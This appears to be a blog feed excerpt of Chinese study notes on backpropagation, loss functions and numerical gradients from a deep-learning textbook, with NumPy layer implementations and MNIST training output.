    从训练数据中随机选择一部分数据。

    步骤 2(计算梯度)

    计算损失函数关于各个权重参数的梯度。(误差反向传播法会在此步出现)

    步骤 3(更新参数)

    将权重参数沿梯度方向进行微小的更新。

    步骤 4(重复)

    重复步骤 1、步骤 2、步骤 3。

    5.7.2 对应误差反向传播法的神经网络的实现

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from common.layers import *
    from common.gradient import numerical_gradient
    from collections import OrderedDict


    class TwoLayerNet:

    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
    """
    进行初始化:
    input_size: 输入层的神经元数
    hidden_size: 隐藏层的神经元数
    output_size: 输出层的神经元数
    weight_init_std: 初始化权重时的高斯分布的规模
    """
    # 初始化权重
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
    self.params['b1'] = np.zeros(hidden_size)
    self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b2'] = np.zeros(output_size)
    # 生成层
    self.layers = OrderedDict()
    self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
    self.layers['Relu1'] = Relu()
    self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
    self.lastLayer = SoftmaxWithLoss()


    def predict(self, x):
    """
    进行识别(推理)
    x: 是图像数据
    """
    for layer in self.layers.values():
    x = layer.forward(x)
    return x


    def loss(self, x, t):
    """
    计算损失函数的值
    x: 输入数据
    t: 监督数据
    """
    y = self.predict(x)
    return self.lastLayer.forward(y, t)


    def accuracy(self, x, t):
    """
    计算识别精度
    """
    y = self.predict(x)
    y = np.argmax(y, axis=1)
    if t.ndim != 1:
    t = np.argmax(t, axis=1)
    accuracy = np.sum(y == t) / float(x.shape[0])
    return accuracy


    def numerical_gradient(self, x, t):
    """
    通过数值微分计算关于权重参数的梯度
    """
    loss_W = lambda W: self.loss(x, t)
    grads = {}
    grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
    grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
    grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
    grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
    return grads


    def gradient(self, x, t):
    """
    通过误差反向传播法计算关于权重参数的梯度
    """
    # forward
    self.loss(x, t)
    # backward
    dout = 1
    dout = self.lastLayer.backward(dout)
    layers = list(self.layers.values())
    layers.reverse()
    for layer in layers:
    dout = layer.backward(dout)
    # 设定
    grads = {}
    grads['W1'] = self.layers['Affine1'].dW
    grads['b1'] = self.layers['Affine1'].db
    grads['W2'] = self.layers['Affine2'].dW
    grads['b2'] = self.layers['Affine2'].db
    return grads

    5.7.3 误差反向传播法的梯度确认

    两种求梯度的方法:

    • 基于数值微分的方法,实现简单,因此,一般情况下不太容易出错

    • 解析性地求解数学式的方法,使用误差反向传播法,即使存在大量的参数,也可以高效地计算梯度。实现很复杂,容易出错。

    确认数值微分求出的梯度结果和误差反向传播法求出的结果是否一致(严格地讲,是非常相近)的操作称为梯度确认(gradient check)

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)
    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
    x_batch = x_train[:3]
    t_batch = t_train[:3]
    grad_numerical = network.numerical_gradient(x_batch, t_batch)
    grad_backprop = network.gradient(x_batch, t_batch)
    # 求各个权重的绝对误差的平均值
    for key in grad_numerical.keys():
    diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key]) )
    print(key + ":" + str(diff))
W1:5.098230563374566e-10
b1:3.2030157216551143e-09
W2:5.229628806065797e-09
b2:1.399595522047492e-07

    误差的计算方法是求各个权重参数中对应元素的差的绝对值,并计算其平均值。

    5.7.4 使用误差反向传播法的学习

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

    iters_num = 10000
    train_size = x_train.shape[0]
    batch_size = 100
    learning_rate = 0.1
    train_loss_list = []
    train_acc_list = []
    test_acc_list = []

    iter_per_epoch = max(train_size / batch_size, 1)

    for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]
    # 通过误差反向传播法求梯度
    grad = network.gradient(x_batch, t_batch)
    # 更新
    for key in ('W1', 'b1', 'W2', 'b2'):
    network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)
    if i % iter_per_epoch == 0:
    train_acc = network.accuracy(x_train, t_train)
    test_acc = network.accuracy(x_test, t_test)
    train_acc_list.append(train_acc)
    test_acc_list.append(test_acc)
    print(train_acc, test_acc)
0.1278 0.1323
0.9025833333333333 0.9064
0.9237166666666666 0.925
0.93455 0.933
0.9447833333333333 0.9427
0.95155 0.9485
0.95825 0.9552
0.96255 0.9593
0.96375 0.9599
0.9665333333333334 0.9619
0.9697166666666667 0.9655
0.9716666666666667 0.9673
0.9735666666666667 0.9672
0.9745 0.9678
0.9774 0.9698
0.9761166666666666 0.9692
0.9789833333333333 0.9722

    5.8 小结

    • 通过使用计算图,可以直观地把握计算过程。

    • 计算图的节点是由局部计算构成的。局部计算构成全局计算。

    • 计算图的正向传播进行一般的计算。通过计算图的反向传播,可以计算各个节点的导数。

    • 通过将神经网络的组成元素实现为层,可以高效地计算梯度(反向传播法)。

    • 通过比较数值微分和误差反向传播法的结果,可以确认误差反向传播法的实现是否正确(梯度确认)。

    ]]>
    + 正文

    理解误差反向传播法:

    • 基于数学式

    • 基于计算图

    5.1 计算图

    5.1.1 用计算图求解

    “从左向右进行计算”是一种正方向上的传播,简称为正向传播(forward propagation)。正向传播是从计算图出发点到结束点的传播。

    既然有正向传播这个名称,当然也可以考虑反向(从图上看的话,就是从右向左)的传播。实际上,这种传播称为反向传播(backward propagation)。反向传播将在接下来的导数计算中发挥重要作用。

    5.1.2 局部计算


    例如苹果和其他很多东西的求和运算(4000 + 200 → 4200)并不关心 4000 这个数字是如何计算而来的,只要把两个数字相加就可以了。换言之,各个节点处只需进行与自己有关的计算(在这个例子中是对输入的两个数字进行加法运算),不用考虑全局。

    5.1.3 为何用计算图解题


    这里,假设我们想知道苹果价格的上涨会在多大程度上影响最终的支付金额,即求“支付金额关于苹果的价格的导数”。设苹果的价格为 $x$,支付金额为 $L$,则相当于求

    $$\frac{\partial L}{\partial x}$$

    这个导数的值表示当苹果的价格稍微上涨时,支付金额会增加多少。

    反向传播从右向左传递导数的值(1→1.1→2.2)。从这个结果中可知,“支付金额关于苹果的价格的导数”的值是 2.2。这意味着,如果苹果的价格上涨 1 日元,最终的支付金额会增加 2.2 日元(严格地讲,如果苹果的价格增加某个微小值,则最终的支付金额将增加那个微小值的 2.2 倍)。

    5.2 链式法则

    计算图的正向传播将计算结果正向(从左到右)传递,其计算过程是我们日常接触的计算过程,所以感觉上可能比较自然。

    反向传播将局部导数向正方向的反方向(从右到左)传递,一开始可能会让人感到困惑。传递这个局部导数的原理,是基于**链式法则(chain rule)**的。

    5.2.2 什么是链式法则

    先从复合函数说起。复合函数是由多个函数构成的函数。比如,$z=(x+y)^2$ 是由下式所示的两个式子构成的。

$$z=t^2,\quad t=x+y$$

    链式法则是关于复合函数的导数的性质,定义如下:

    如果某个函数由复合函数表示,则该复合函数的导数可以用构成复合函数的各个函数的导数的乘积表示。

    $$\frac{\partial z}{\partial x} = \frac{\partial z}{\partial t} \frac{\partial t}{\partial x} = 2t \cdot 1 = 2(x+y)$$

    5.2.3 链式法则和计算图


    根据计算图的反向传播的结果,$\frac{\partial z}{\partial x}=2(x+y)$,计算图的反向传播是基于链式法则成立的。
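这一结果可以用数值微分简单验证(示意):

def numerical_diff(f, x, h=1e-4):
    return (f(x + h) - f(x - h)) / (2 * h)

x, y = 2.0, 3.0
# 解析解:dz/dx = 2(x + y) = 10
print(numerical_diff(lambda x: (x + y) ** 2, x))  # 约 10.0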

    5.3 反向传播

    5.3.1 加法节点的反向传播


    考虑 $z=x+y$,$\frac{\partial z}{\partial x}=1,\frac{\partial z}{\partial y}=1$

    $z=x+y$ 的计算位于这个大型计算图的某个地方,从上游会传来 $\frac{\partial L}{\partial z}$ 的值,并向下游传递 $\frac{\partial L}{\partial x}$ 和 $\frac{\partial L}{\partial y}$。

    5.3.2 乘法节点的反向传播

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$


    加法的反向传播只是将上游的值传给下游,并不需要正向传播的输入信号。但是,乘法的反向传播需要正向传播时的输入信号值。因此,实现乘法节点的反向传播时,要保存正向传播的输入信号。

    5.3.3 苹果的例子

    这里要解的问题是苹果的价格、苹果的个数、消费税这 3 个变量各自如何影响最终支付的金额。这个问题相当于求“支付金额关于苹果的价格的导数”“支付金额关于苹果的个数的导数”“支付金额关于消费税的导数”。

    5.4 简单层的实现

    把要实现的计算图的乘法节点称为“乘法层”(MulLayer),加法节点称为“加法层”(AddLayer)。

    5.4.1 乘法层的实现

层的实现中有两个共通的方法(接口):forward() 和 backward()。forward() 对应正向传播,backward() 对应反向传播。

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

class MulLayer:
    def __init__(self):
        """
        定义 x 和 y(保存正向传播的输入信号)
        """
        self.x = None
        self.y = None

    def forward(self, x, y):
        self.x = x
        self.y = y
        out = x * y
        return out

    def backward(self, dout):
        dx = dout * self.y  # 翻转 x 和 y
        dy = dout * self.x
        return dx, dy
    apple = 100
    apple_num = 2
    tax = 1.1

    # layer
    mul_apple_layer = MulLayer()
    mul_tax_layer = MulLayer()

    # forward
    apple_price = mul_apple_layer.forward(apple, apple_num) # 苹果总价
    price = mul_tax_layer.forward(apple_price, tax) # 加上税收总价
    print(price) # 220
    220.00000000000003

    此外,关于各个变量的导数可由backward()求出。

    # backward
    dprice = 1
    dapple_price, dtax = mul_tax_layer.backward(dprice)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price)
    print(dapple, dapple_num, dtax) # 2.2 110 200
    2.2 110.00000000000001 200

    5.4.2 加法层的实现

class AddLayer:
    def __init__(self):
        """
        加法层不需要特意进行初始化,所以 __init__() 中什么也不运行
        """
        pass

    def forward(self, x, y):
        out = x + y
        return out

    def backward(self, dout):
        dx = dout * 1
        dy = dout * 1
        return dx, dy

    使用加法层和乘法层,实现上图所示的购买 2 个苹果和 3 个橘子。

    apple = 100
    apple_num = 2
    orange = 150
    orange_num = 3
    tax = 1.1

    # layer 生成必要的层
    mul_apple_layer = MulLayer()
    mul_orange_layer = MulLayer()
    add_apple_orange_layer = AddLayer()
    mul_tax_layer = MulLayer()

    # forward 合适的顺序调用正向传播的 forward() 方法
    apple_price = mul_apple_layer.forward(apple, apple_num) #(1)
    orange_price = mul_orange_layer.forward(orange, orange_num) #(2)
    all_price = add_apple_orange_layer.forward(apple_price, orange_price) #(3)
    price = mul_tax_layer.forward(all_price, tax) #(4)

    # backward 与正向传播相反的顺序调用反向传播的 backward() 方法
    dprice = 1
    dall_price, dtax = mul_tax_layer.backward(dprice) #(4)
    dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price) #(3)
    dorange, dorange_num = mul_orange_layer.backward(dorange_price) #(2)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price) #(1)

    print(price) # 715
    print(dapple_num, dapple, dorange, dorange_num, dtax) # 110 2.2 3.3 165 650
715.0000000000001
110.00000000000001 2.2 3.3000000000000003 165.0 650

    5.5 激活函数层的实现

    5.5.1 ReLU 层

    ReLU 由下式表示:

$$y=\begin{cases}x & (x>0)\\ 0 & (x\le 0)\end{cases}$$

$$\frac{\partial y}{\partial x}=\begin{cases}1 & (x>0)\\ 0 & (x\le 0)\end{cases}$$

class Relu:
    def __init__(self):
        self.mask = None

    def forward(self, x):
        """
        mask 是由 True/False 构成的 NumPy 数组,
        它会把正向传播时的输入 x 的元素中小于等于 0 的地方保存为 True,
        其他地方(大于 0 的元素)保存为 False
        """
        self.mask = (x <= 0)
        out = x.copy()
        out[self.mask] = 0
        return out

    def backward(self, dout):
        """
        如果正向传播时的输入值小于等于 0,则反向传播的值为 0。
        反向传播中会使用正向传播时保存的 mask,
        将从上游传来的 dout 中对应 mask 为 True 的元素设为 0
        """
        dout[self.mask] = 0
        dx = dout
        return dx

    5.5.2 Sigmoid 层

$$
\begin{aligned}
y &= \frac{1}{1+\exp(-x)} \\
y' &= \left(\frac{1}{1+\exp(-x)}\right)' \\
&= -y^2\left(-\exp(-x)\right) \\
&= y^2\exp(-x) \\
&= y(1-y)
\end{aligned}
$$

class Sigmoid:
    def __init__(self):
        self.out = None

    def forward(self, x):
        """
        正向传播时将输出保存在实例变量 out 中
        """
        out = 1 / (1 + np.exp(-x))
        self.out = out
        return out

    def backward(self, dout):
        """
        反向传播时,使用保存的 out 进行计算
        """
        dx = dout * (1.0 - self.out) * self.out
        return dx

    5.6 Affine/Softmax 层的实现

    5.6.1 Affine 层

神经网络的正向传播中进行的矩阵的乘积运算,在几何学领域被称为“仿射变换”。因此,这里将进行仿射变换的处理实现为“Affine 层”。

    仿射层(Affine Layer)
神经网络中的一个全连接层。仿射(Affine)的意思是前面一层中的每一个神经元都连接到当前层中的每一个神经元。在许多方面,这是神经网络的「标准」层。仿射层通常被加在卷积神经网络或循环神经网络做出最终预测前的输出的顶层。仿射层的一般形式为 $y=f(Wx+b)$,其中 $x$ 是层输入,$W$ 是权重矩阵,$b$ 是偏置向量,$f$ 是一个非线性激活函数。

    5.6.2 批版本的 Affine 层


    1. $\frac{\partial L}{\partial \mathbf X} = \frac{\partial L}{\partial \mathbf Y}\cdot \mathbf W^T$

    2. $\frac{\partial L}{\partial \mathbf W} = \mathbf X^T\cdot \frac{\partial L}{\partial \mathbf Y}$

    3. $\frac{\partial L}{\partial \mathbf B} = \frac{\partial L}{\partial \mathbf Y}$ 的第一个轴(第 0 轴)方向上的和

class Affine:
    def __init__(self, W, b):
        self.W = W
        self.b = b
        self.x = None
        self.dW = None
        self.db = None

    def forward(self, x):
        self.x = x
        out = np.dot(x, self.W) + self.b
        return out

    def backward(self, dout):
        dx = np.dot(dout, self.W.T)       # (1)
        self.dW = np.dot(self.x.T, dout)  # (2)
        self.db = np.sum(dout, axis=0)    # (3)
        return dx

    5.6.3 Softmax-with-Loss 层

class SoftmaxWithLoss:
    def __init__(self):
        self.loss = None  # 损失
        self.y = None     # softmax 的输出
        self.t = None     # 监督数据(one-hot vector)

    def forward(self, x, t):
        self.t = t
        self.y = softmax(x)
        self.loss = cross_entropy_error(self.y, self.t)
        return self.loss

    def backward(self, dout=1):
        batch_size = self.t.shape[0]
        dx = (self.y - self.t) / batch_size
        return dx

    5.7 误差反向传播法的实现

    5.7.1 神经网络学习的全貌图

    前提

    神经网络中有合适的权重和偏置,调整权重和偏置以便拟合训练数据的过程称为学习。神经网络的学习分为下面 4 个步骤。

    步骤 1(mini-batch)

    从训练数据中随机选择一部分数据。

    步骤 2(计算梯度)

    计算损失函数关于各个权重参数的梯度。(误差反向传播法会在此步出现)

    步骤 3(更新参数)

    将权重参数沿梯度方向进行微小的更新。

    步骤 4(重复)

    重复步骤 1、步骤 2、步骤 3。

    5.7.2 对应误差反向传播法的神经网络的实现

import sys, os
sys.path.append(os.pardir)
import numpy as np
from common.layers import *
from common.gradient import numerical_gradient
from collections import OrderedDict


class TwoLayerNet:

    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        进行初始化:
        input_size: 输入层的神经元数
        hidden_size: 隐藏层的神经元数
        output_size: 输出层的神经元数
        weight_init_std: 初始化权重时的高斯分布的规模
        """
        # 初始化权重
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)

        # 生成层
        self.layers = OrderedDict()
        self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
        self.layers['Relu1'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
        self.lastLayer = SoftmaxWithLoss()

    def predict(self, x):
        """
        进行识别(推理)
        x: 图像数据
        """
        for layer in self.layers.values():
            x = layer.forward(x)
        return x

    def loss(self, x, t):
        """
        计算损失函数的值
        x: 输入数据
        t: 监督数据
        """
        y = self.predict(x)
        return self.lastLayer.forward(y, t)

    def accuracy(self, x, t):
        """
        计算识别精度
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        if t.ndim != 1:
            t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy

    def numerical_gradient(self, x, t):
        """
        通过数值微分计算关于权重参数的梯度
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads

    def gradient(self, x, t):
        """
        通过误差反向传播法计算关于权重参数的梯度
        """
        # forward
        self.loss(x, t)

        # backward
        dout = 1
        dout = self.lastLayer.backward(dout)
        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
            dout = layer.backward(dout)

        # 设定
        grads = {}
        grads['W1'] = self.layers['Affine1'].dW
        grads['b1'] = self.layers['Affine1'].db
        grads['W2'] = self.layers['Affine2'].dW
        grads['b2'] = self.layers['Affine2'].db
        return grads

    5.7.3 误差反向传播法的梯度确认

    两种求梯度的方法:

    • 基于数值微分的方法,实现简单,因此,一般情况下不太容易出错

    • 解析性地求解数学式的方法,使用误差反向传播法,即使存在大量的参数,也可以高效地计算梯度。实现很复杂,容易出错。

    确认数值微分求出的梯度结果和误差反向传播法求出的结果是否一致(严格地讲,是非常相近)的操作称为梯度确认(gradient check)

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# 读入数据
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

x_batch = x_train[:3]
t_batch = t_train[:3]

grad_numerical = network.numerical_gradient(x_batch, t_batch)
grad_backprop = network.gradient(x_batch, t_batch)

# 求各个权重的绝对误差的平均值
for key in grad_numerical.keys():
    diff = np.average(np.abs(grad_backprop[key] - grad_numerical[key]))
    print(key + ":" + str(diff))
W1:5.098230563374566e-10
b1:3.2030157216551143e-09
W2:5.229628806065797e-09
b2:1.399595522047492e-07

    误差的计算方法是求各个权重参数中对应元素的差的绝对值,并计算其平均值。

    5.7.4 使用误差反向传播法的学习

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# 读入数据
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

iters_num = 10000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
train_loss_list = []
train_acc_list = []
test_acc_list = []

iter_per_epoch = max(train_size / batch_size, 1)

for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    # 通过误差反向传播法求梯度
    grad = network.gradient(x_batch, t_batch)

    # 更新
    for key in ('W1', 'b1', 'W2', 'b2'):
        network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)

    if i % iter_per_epoch == 0:
        train_acc = network.accuracy(x_train, t_train)
        test_acc = network.accuracy(x_test, t_test)
        train_acc_list.append(train_acc)
        test_acc_list.append(test_acc)
        print(train_acc, test_acc)
0.1278 0.1323
0.9025833333333333 0.9064
0.9237166666666666 0.925
0.93455 0.933
0.9447833333333333 0.9427
0.95155 0.9485
0.95825 0.9552
0.96255 0.9593
0.96375 0.9599
0.9665333333333334 0.9619
0.9697166666666667 0.9655
0.9716666666666667 0.9673
0.9735666666666667 0.9672
0.9745 0.9678
0.9774 0.9698
0.9761166666666666 0.9692
0.9789833333333333 0.9722

    5.8 小结

    • 通过使用计算图,可以直观地把握计算过程。

    • 计算图的节点是由局部计算构成的。局部计算构成全局计算。

    • 计算图的正向传播进行一般的计算。通过计算图的反向传播,可以计算各个节点的导数。

    • 通过将神经网络的组成元素实现为层,可以高效地计算梯度(反向传播法)。

    • 通过比较数值微分和误差反向传播法的结果,可以确认误差反向传播法的实现是否正确(梯度确认)。

    ]]>
    @@ -8171,7 +8171,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-4-%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%9A%84%E5%AD%A6%E4%B9%A0/ - 正文

    4.1 从数据中学习

    4.1.1 数据驱动

    深度学习有时也称为端到端机器学习(end-to-end machine learning)。这里所说的端到端是指从一端到另一端的意思,也就是从原始数据(输入)中获得目标结果(输出)的意思。

    4.1.2 训练数据和测试数据

机器学习中,一般将数据分为训练数据(也可称为监督数据)和测试数据两部分来进行学习和实验等。

    • 首先,使用训练数据进行学习,寻找最优的参数

    • 然后,使用测试数据评价训练得到的模型的实际能力

    4.2 损失函数

    神经网络的学习中所用的指标称为损失函数(loss function)。这个损失函数可以使用任意函数,但一般用均方误差和交叉熵误差等。

    4.2.1 均方误差

    $$E=\frac{1}{2}\sum_k(y_k-t_k)^2$$

    $y_k$ 表示神经网络的输出,$t_k$ 表示监督数据,$k$ 表示数据的维数。

def mean_squared_error(y, t):
    return 0.5 * np.sum((y - t) ** 2)

# 设“2”为正确解
t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]

# 例 1:“2”的概率最高的情况(0.6)
y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
mean_squared_error(np.array(y), np.array(t))
0.09750000000000003

# 例 2:“7”的概率最高的情况(0.6)
y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
mean_squared_error(np.array(y), np.array(t))
0.5975

    均方误差显示第一个例子的输出结果与监督数据更加吻合。

    4.2.2 交叉熵误差

    $$E=-\sum_kt_k\log y_k$$

def cross_entropy_error(y, t):
    """
    参数 y 和 t 是 NumPy 数组。函数内部在计算 np.log 时,加上了一个微小值 delta。
    这是因为,当出现 np.log(0) 时,np.log(0) 会变为负无限大的 -inf,
    这样一来就会导致后续计算无法进行。作为保护性对策,添加一个微小值可以防止负无限大的发生。
    """
    delta = 1e-7
    return -np.sum(t * np.log(y + delta))

t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
cross_entropy_error(np.array(y), np.array(t))
0.510825457099338

y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
cross_entropy_error(np.array(y), np.array(t))
2.302584092994546

4.2.3 mini-batch 学习

    $$E=-\frac{1}{N}\sum_n\sum_kt_{nk}\log y_{nk}$$

    • 假设数据有 $N$ 个

• $t_{nk}$ 表示第 $n$ 个数据的第 $k$ 个元素的值($y_{nk}$ 是神经网络的输出,$t_{nk}$ 是监督数据)。

    从全部数据中选出一部分,作为全部数据的“近似”。神经网络的学习也是从训练数据中选出一批数据(称为 mini-batch, 小批量),然后对每个 mini-batch 进行学习。这种学习方式称为 mini-batch 学习

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# Setting one_hot_label=True yields one-hot encoded labels
# (only the correct-answer label is 1; everything else is 0).
(x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, one_hot_label=True)
print(x_train.shape) # (60000, 784) 60000 training samples; each input is a 784-dimensional (28 × 28) image
print(t_train.shape) # (60000, 10)  the supervised data is 10-dimensional
(60000, 784)
(60000, 10)

Randomly draw 10 samples from this training data.

train_size = x_train.shape[0]
batch_size = 10
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]

np.random.choice() draws as many random numbers as you want from the specified range.

For example, np.random.choice(60000, 10) randomly picks 10 numbers between 0 and 59999:

np.random.choice(60000, 10)
array([30142, 18947,  8349, 38135,  8519, 25729, 36061, 11248, 12602,       31498])

4.2.4 Implementing Mini-batch Cross-Entropy Error

When the supervised data $t$ is one-hot encoded:

def cross_entropy_error(y, t):
    if y.ndim == 1:
        # For a single data point (y is 1-D), reshape to a 1-row batch
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # For a mini-batch, normalize by the batch size to get the
    # average cross-entropy error per data point
    return -np.sum(t * np.log(y + 1e-7)) / batch_size

When the supervised data is in label form (not one-hot, but labels such as "2" or "7"):

def cross_entropy_error(y, t):
    if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # y[np.arange(batch_size), t] extracts, for each data point, the
    # network output corresponding to its correct-answer label
    return -np.sum(np.log(y[np.arange(batch_size), t] + 1e-7)) / batch_size
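The two versions compute the same quantity. A small check with illustrative values (the arrays here are just the earlier examples stacked into a batch):

import numpy as np

y = np.array([[0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0],
              [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]])
t_onehot = np.array([[0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
                     [0, 0, 0, 0, 0, 0, 0, 1, 0, 0]])
t_label = np.argmax(t_onehot, axis=1)  # array([2, 7])

batch_size = y.shape[0]
loss_onehot = -np.sum(t_onehot * np.log(y + 1e-7)) / batch_size
loss_label = -np.sum(np.log(y[np.arange(batch_size), t_label] + 1e-7)) / batch_size
print(loss_onehot, loss_label)  # both print the same average loss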

4.2.5 Why Set a Loss Function?

When training a neural network, recognition accuracy cannot be used as the metric. If it were, the derivatives of the parameters would be 0 almost everywhere: accuracy is discrete, so it barely responds to tiny parameter changes, and when it does respond, its value jumps discontinuously.

4.3 Numerical Differentiation

4.3.1 Derivatives

The definition of the derivative:

    $$\frac{\mathrm df(x)}{\mathrm dx}=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}$$

A poor implementation:

def numerical_diff(f, x):
    h = 10e-50
    return (f(x+h) - f(x)) / h

• $h$ is so small that rounding error results (see the check below).

• The difference between (x + h) and x is a forward difference; to reduce the error, we can switch to a central difference.
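For instance, a value this small already rounds away to zero in 32-bit floats, so the numerator would not move at all:

import numpy as np
print(np.float32(1e-50))  # 0.0 -- the tiny h is rounded away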

$$\frac{\mathrm df(x)}{\mathrm dx}=\lim_{h\to 0}\frac{f(x+h)-f(x-h)}{2h}$$

def numerical_diff(f, x):
    h = 1e-4 # 0.0001
    return (f(x + h) - f(x - h)) / (2 * h)

4.3.2 An Example of Numerical Differentiation

Differentiate $y=0.01x^2+0.1x$:

def function_1(x):
    return 0.01 * x ** 2 + 0.1 * x

import numpy as np
import matplotlib.pylab as plt

x = np.arange(0.0, 20.0, 0.1) # x from 0 to 20 in steps of 0.1
y = function_1(x)
plt.xlabel("x")
plt.ylabel("f(x)")
plt.plot(x, y)
plt.show()

(figure: graph of f(x) = 0.01x² + 0.1x)

    numerical_diff(function_1, 5)
    0.1999999999990898
    numerical_diff(function_1, 10)
    0.2999999999986347

4.3.3 Partial Derivatives

For the function $f(x_0,x_1)=x_0^2+x_1^2$:

def function_2(x):
    return x[0] ** 2 + x[1] ** 2 # or: return np.sum(x ** 2)

The partial derivative $\frac{\partial f}{\partial x_0}$ at $x_0=3,x_1=4$:

def function_tmp1(x0):
    return x0*x0 + 4.0**2.0

numerical_diff(function_tmp1, 3.0)
6.00000000000378

The partial derivative $\frac{\partial f}{\partial x_1}$ at $x_0=3,x_1=4$:

def function_tmp2(x1):
    return 3.0 ** 2.0 + x1 * x1

numerical_diff(function_tmp2, 4.0)
7.999999999999119

4.4 Gradients

A vector that gathers the partial derivatives of all the variables, such as $\left(\frac{\partial f}{\partial x_0},\frac{\partial f}{\partial x_1}\right)$, is called a gradient.

def numerical_gradient(f, x):
    h = 1e-4 # 0.0001
    grad = np.zeros_like(x) # array of zeros with the same shape as x
    for idx in range(x.size):
        tmp_val = x[idx]

        # compute f(x+h)
        x[idx] = tmp_val + h
        fxh1 = f(x)

        # compute f(x-h)
        x[idx] = tmp_val - h
        fxh2 = f(x)

        grad[idx] = (fxh1 - fxh2) / (2 * h)
        x[idx] = tmp_val # restore the original value

    return grad

Gradients at the points $(3,4)$, $(0,2)$ and $(3,0)$:

    numerical_gradient(function_2, np.array([3.0, 4.0]))
    array([6., 8.])
    numerical_gradient(function_2, np.array([0.0, 2.0]))
    array([0., 4.])
    numerical_gradient(function_2, np.array([3.0, 0.0]))
    array([6., 0.])

(figure: the gradients of $f(x_0,x_1)=x_0^2+x_1^2$ plotted as a vector field)

At each point the gradient points in a direction that lowers the function's value there. More precisely, the gradient's direction is the one in which the function's value decreases the most at that point.

4.4.1 The Gradient Method

The gradient method uses gradients cleverly to search for a function's minimum (or a value as small as possible).

The gradient is 0 at local minima, at minima, and at so-called **saddle points** (checked numerically below).
